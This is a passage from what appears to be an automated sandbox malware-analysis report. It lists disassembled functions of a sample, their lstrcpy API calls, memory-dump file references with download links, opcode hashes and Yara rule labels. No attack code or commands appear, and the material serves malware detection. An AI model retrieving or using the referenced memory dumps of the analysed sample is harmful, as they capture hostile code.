                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception
                              • String ID: PvY$P\
                              • API String ID: 2807920213-778110337
                              • Opcode ID: 035252b6f10cf96f574326d906c667ccb9c8b0bd96c913eb3e61d1bfec8aaef1
                              • Instruction ID: 0df04504642317bdfa21b1b856ed3fb8a7448ef1539e8b52ad4e9dc46312eddd
                              • Opcode Fuzzy Hash: 035252b6f10cf96f574326d906c667ccb9c8b0bd96c913eb3e61d1bfec8aaef1
                              • Instruction Fuzzy Hash: 97E0227490530A96DF04EBF89C15AFFBAA8BF20304F000A6DE926921C1FBB0A6048192
                              Function 00591410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000), ref: 0059152D
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 0059154F
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 00591571
                                • Part of subcall function 00591510: lstrcpy.KERNEL32(00000000,?), ref: 00591593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591437
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591459
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 5b2e7d2034809092d7ef46af12071e1096a33468ff3a146b4e7cd82933594ddd
                              • Instruction ID: 54f83e25d0bba14d70c94e6896e10d2a3a2ca9bae878d966b14d78a535a95490
                              • Opcode Fuzzy Hash: 5b2e7d2034809092d7ef46af12071e1096a33468ff3a146b4e7cd82933594ddd
                              • Instruction Fuzzy Hash: A131A274A01F13AFDB68DF3AD548966BBE5BF48700704492DA996C3B20EB74F811CB84
                              Function 005B1550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 005B1581
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B15B9
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B15F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1629
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 641a1d75acadadf72974f2efaa28143cb99ddda2ee8aa2c0f15f31736cb527ae
                              • Instruction ID: dd88dadf9cc9a116273401724a13466580330dac3483aa82abeade809321460c
                              • Opcode Fuzzy Hash: 641a1d75acadadf72974f2efaa28143cb99ddda2ee8aa2c0f15f31736cb527ae
                              • Instruction Fuzzy Hash: 3921BBB4601B039BDB74DF2AC569A27BBE5BF84700F544A1CA496C7A90DB34F841CF94
                              Function 00591510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 0059152D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059154F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591571
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591593
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 9cae46b25b03696a019e65682c4abb934aa1b692824cd64c88f1c9dcef7f76aa
                              • Instruction ID: 822055149507ba7466eccaa418a5e98b41b0148ccbc1d218dcf1cea517e28d38
                              • Opcode Fuzzy Hash: 9cae46b25b03696a019e65682c4abb934aa1b692824cd64c88f1c9dcef7f76aa
                              • Instruction Fuzzy Hash: 0611DAB4A12B03ABDF249F76D45D927BBF8BF84701706452DA456C7A50EB34E8018F94